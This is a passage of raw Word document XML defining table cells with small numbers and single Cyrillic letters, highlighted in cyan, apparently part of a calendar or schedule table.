            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>26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21"/>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24</w:t>
            </w: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w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FF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30</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30</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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23</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42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11</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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13</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480" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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36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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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32</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right="100"/>
              <w:jc w:val="right"/>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140" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>В</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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26</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16</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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>7</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42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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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21</w:t>
            </w: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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>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color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>Ы</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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="220"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>15</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31</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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520" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>Е Е</w:t>
            </w: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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="6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420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>1</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30</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18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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>33</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gridSpan w:val="3"/>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520" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>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Н</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="71"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="71"/>
                <w:sz w:val="18"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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33</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18</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23</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28</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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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1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140" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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228" w:lineRule="exact"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>13</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228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>Я</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>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280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>30</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00FFFF"/>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00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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40" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="16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228" w:lineRule="exact"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>11</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20" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
